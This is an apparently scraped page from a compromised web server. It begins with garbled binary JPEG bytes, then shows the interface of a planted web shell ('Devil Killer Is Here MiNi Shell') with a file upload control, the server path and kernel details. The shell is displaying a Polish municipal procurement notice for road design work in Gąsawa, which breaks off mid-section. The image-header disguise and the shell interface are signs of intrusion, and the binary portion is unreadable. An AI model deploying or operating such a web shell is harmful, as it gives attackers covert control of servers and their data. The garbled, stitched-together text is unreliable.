JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250129/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250129/0007413601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej dla przebudowy drogi gminnej w Godawach, drogi gminnej w Drewnie, drogi gminnej Chomiąża Szlachecka - Laski Wielkie i drogi gminnej w Rozalinowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GĄSAWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351185</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żnińska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gąsawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@gasawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gasawa.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej dla przebudowy drogi gminnej w Godawach, drogi gminnej w Drewnie, drogi gminnej Chomiąża Szlachecka - Laski Wielkie i drogi gminnej w Rozalinowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01c0a2c1-1402-4a1f-b8be-b6e1cb5f809f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00074136</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00018595/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowo-kosztorysowej dla przebudowy drogi gminnej w Godawach, przebudowy drogi gminnej w Drewnie, drogi Chomiąża Szlachecka - Laski Wielkie i drogi w Rozalinowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1051878 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres postępowania: https://platformazakupowa.pl/transakcja/1051878 Komunikacja w postępowaniu - przy użyciu środków komunikacji elektronicznej. Ofertę, ośw. o którym mowa w art. 125 ust. 1 Pzp, podm. śr. dowodowe, pełnomocnictwa, zobowiązanie podmiotu udost. zasoby sporządza się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym, w ogólnie dostępnych formatach danych.<br/>Formaty plików powinny być zgodne z Rozp. Prezesa RM z dnia 21.05.2024 r. w sprawie Krajowych Ram Interoperacyjności, min. wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz min. wymagań dla syst. teleinformatycznych.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg). W celu kompresji danych rekomenduje się formaty: .zip, .7Z.<br/>Wśród formatów nie występujących w rozporz. są: .rar .gif .bmp .numbers .pages. Dokumenty złożone w tych plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j. Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>• komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>• zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>• włączona obsługa JavaScript,<br/>• zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej „RODO”) (Dz. U. UE. L. 119.1 z 04.05.2016) informuję, iż:<br/>1) Administratorem danych osobowych jest Burmistrz Miasta i Gminy Gąsawa z siedzibą w Gąsawie, przy ul. Żnińskiej 8, 88-410 Gąsawa. Z administratorem można się skontaktować poprzez adres email: ug@gasawa.pl lub pisemnie na adres siedziby administratora;<br/>2) Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez email iod@gasawa.pl. Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych;<br/>3) Pani/Pana dane osobowe przetwarzane będą, na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, w celu realizacji procesu wyboru wykonawcy na podstawie prowadzonego postępowania o udzielenie zamówienia publicznego, a następnie realizacji postanowień umownych związanych z wykonywanym zamówieniem;<br/>4) w związku z przetwarzaniem Pani/Pana danych w celach wskazanych powyżej, dane osobowe mogą być udostępniane innym odbiorcom lub kategoriom odbiorców danych osobowych, na podstawie przepisów prawa oraz zawartych umów powierzenia przetwarzania danych, jeżeli wymagane byłoby to w celu realizacji postanowień umownych;<br/>5) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany;<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>7) posiada Pani/Pan prawo do:<br/>a) dostępu do danych osobowych, na podstawie art. 15 RODO, przy czym administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>b) sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16 RODO, przy czym skorzystanie z niniejszego uprawnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych;<br/>c) ograniczenia przetwarzania danych osobowych, na podstawie art. 18 RODO, przy czym wystąpienie z żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>d) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu prawo do:<br/>a) usunięcia lub przenoszenia danych osobowych;<br/>b) wniesienia sprzeciwu wobec przetwarzania danych osobowych;<br/>10) podanie danych osobowych jest konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji postanowień umownych. Niepodanie danych będzie skutkowało brakiem możliwości rozpatrzenia oferty złożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRG.271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej w Godawach. <br/><br/>Droga obecnie o statusie drogi niepublicznej, stanowiąca dojazd do gruntów rolnych, gospodarstwa rolnego i kilku działek budowlanych. Droga o nawierzchni gruntowej, miejscowo utwardzona tłuczniem w złym stanie technicznym – do rozbiórki. <br/>Lokalizacja: województwo kujawsko-pomorskie, powiat żniński, gmina Gąsawa, miejscowość Godawy. <br/>Od skrzyżowania z Dz. nr 142/1, dz. nr 144 do dz. nr 131/27 obręb Godawy. <br/>Długość: ok. 1070 m<br/>Szerokość projektowa nawierzchni bitumicznej jezdni 3,5 m + pobocza tłuczniowe i mijanki<br/>Zakres prac: Korytowanie, warstwa odsączająca, podbudowa, warstwa wiążąca z asfaltobetonu, warstwa ścieralna z asfaltobetonu, pobocza, zjazdy, mijanki. <br/>W związku z ograniczoną szerokością dostępnego pasa drogowego, będzie konieczność dokonania geodezyjnego podziału działek przylegających do drogi gminnej, w celu jej poszerzenia, (a następnie ich wykupu przez Inwestora) oraz przygotowania dokumentacji niezbędnej do uzyskania decyzji zezwalającej na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. <br/>Zakres prac projektowych: <br/>a)	projekt zagospodarowania terenu, <br/>b)	projekt techniczny, z przekrojami, niweletą, <br/>c)	szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, <br/>d)	projekt stałej organizacji ruchu, <br/>e)	przedmiar robót, <br/>f)	kosztorys inwestorski, <br/>g)	wykonanie wszelkich opracowań, uzyskanie uzgodnień, opinii od właściwych organów, niezbędnych do złożenia wniosku oraz uzyskania decyzji ZRID, w tym projekty podziałów nieruchomości w celu poszerzenia pasa drogowego,<br/>h)	inne, niewymienione wyżej opracowania, do wykonania kompletnego projektu w tym dokumenty niezbędne do uzyskania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia, takie jak karta informacyjna przedsięwzięcia lub raport oddziaływania na środowisko. <br/><br/>W oparciu o analizę szerokości działek drogowych na podstawie map szacuje się wykonanie prawdopodobnie podziałów 3 nieruchomości. Ostateczny zakres niezbędnych poszerzeń pasa drogowego oraz podziałów w celu zaprojektowania przebudowy drogi zgodnie z warunkami technicznymi, zostanie określony przez Projektanta w porozumieniu z Zamawiającym.<br/><br/>Zamawiający dysponuje mapą do celów projektowych dla planowanego zamierzenia inwestycyjnego, które w formacie pdf i dxf udostępni Wykonawcy. <br/>Wykonawca na etapie prac projektowych zobowiązany jest do bieżącego uzgadniania z Zamawiającym rozwiązań projektowych, w tym warstw konstrukcyjnych, zastosowanych materiałów, itp., propozycji podziałów nieruchomości, organizacji ruchu.<br/><br/>Dokumentacja w wersji papierowej w 5 egz. oraz elektronicznej w formacie pdf. , z wyjątkiem przedmiaru robot i kosztorysu, który należy wykonać w 2 egz. w wersji papierowej i elektronicznej w formacie pdf i ath.<br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest przed zawarciem umowy do przedłożenia harmonogramu rzeczowo-finansowego, obrazującego etapy prac projektowych do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone z postępowania. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) kryterium „C” - cena wykonania zamówienia – 60,0 pkt .<br/><br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 60 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/>Ocena ofert w zakresie kryterium „C” –cena zostanie dokonana według poniższego algorytmu.<br/><br/>Liczba punktów „C” = (najniższa oferowana cena brutto / cena brutto oferty badanej) x 60<br/>a) Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. Zamawiający wymaga aby Wykonawca w formularzu ofertowym podał łączną cenę ryczałtową za wykonanie całego przedmiotu zamówienia.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2) kryterium „D” doświadczenie Wykonawcy – liczba wykonanych dokumentacji projektowych w zakresie budowy lub przebudowy dróg, objętych następnie decyzją zezwalającą na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych – 40 pkt,<br/> gdzie minimalna wymagana liczba wynosi 2. <br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/><br/>Ocena ofert w zakresie kryterium „D” – doświadczenie zostanie dokonana według poniższego wzoru.<br/>liczba wykonanych dokumentacji objętych ZRID – 2 – 0 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 3– 10 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 4 – 20 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 5 – 30 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 6 i więcej – 40 punktów<br/><br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Zamawiający dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej w Drewnie <br/><br/>Droga obecnie o statusie drogi niepublicznej, stanowiąca dojazd do gruntów rolnych, gospodarstwa rolnego i kilku działek budowlanych. Droga o nawierzchni gruntowej, utwardzona tłuczniem o niewystarczającej nośności. <br/>Lokalizacja: województwo kujawsko-pomorskie, powiat żniński, gmina Gąsawa, miejscowość Drewno<br/>Dz. nr 120/1, 119/1, 120/2, 110/3, 3031/4, 103 obręb Drewno od dr. powiatowej do wjazdu na posesję - dz. nr 102 <br/>Długość ok. 630 m. <br/>Szerokość projektowa jezdni o nawierzchni bitumicznej 3,5 m + pobocza tłuczniowe i mijanki<br/>Zakres prac: Korytowanie, warstwa odsączająca, podbudowa, warstwa wiążąca z asfaltobetonu, warstwa ścieralna z asfaltobetonu, pobocza, zjazdy, mijanki. <br/>W związku z ograniczoną szerokością dostępnego pasa drogowego oraz przebiegiem drogi częściowo poza pasem drogowym, może zaistnieć konieczność dokonania geodezyjnego podziału niektórych działek przylegających do drogi gminnej, w celu jej poszerzenia, (a następnie ich wykupu przez Inwestora) oraz przygotowania dokumentacji niezbędnej do uzyskania decyzji zezwalającej na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. <br/>Zakres prac projektowych: <br/>a)	projekt zagospodarowania terenu, <br/>b)	projekt techniczny, z przekrojami, niweletą, <br/>c)	szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, <br/>d)	projekt stałej organizacji ruchu, <br/>e)	przedmiar robót, <br/>f)	kosztorys inwestorski, <br/>g)	wykonanie wszelkich opracowań, uzyskania uzgodnień, opinii od właściwych organów, niezbędnych do złożenia wniosku oraz uzyskania decyzji ZRID, w tym projekty podziałów nieruchomości w celu poszerzenia pasa drogowego. <br/>h)	Inne, niewymienione wyżej opracowania, niezbędne do wykonania kompletnego projektu. <br/><br/>W oparciu o analizę szerokości działek drogowych na podstawie map szacuje się wykonanie prawdopodobnie podziałów 3 nieruchomości. Ostateczny zakres niezbędnych poszerzeń pasa drogowego oraz podziałów w celu zaprojektowania przebudowy drogi zgodnie z warunkami technicznymi, zostanie określony przez Projektanta w porozumieniu z Zamawiającym.<br/><br/>Zamawiający dysponuje mapą do celów projektowych dla planowanego zamierzenia inwestycyjnego, które w formacie pdf i dxf udostępni Wykonawcy. <br/>Wykonawca na etapie prac projektowych zobowiązany jest do bieżącego uzgadniania z Zamawiającym rozwiązań projektowych, w tym warstw konstrukcyjnych, zastosowanych materiałów, itp., propozycji podziałów nieruchomości, organizacji ruchu.<br/><br/>Dokumentacja w wersji papierowej w 5 egz. oraz elektronicznej w formacie pdf. , z wyjątkiem przedmiaru robot i kosztorysu, który należy wykonać w 2 egz. w wersji papierowej i elektronicznej w formacie pdf i ath.<br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest przed zawarciem umowy do przedłożenia harmonogramu rzeczowo-finansowego, obrazującego etapy prac projektowych do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span 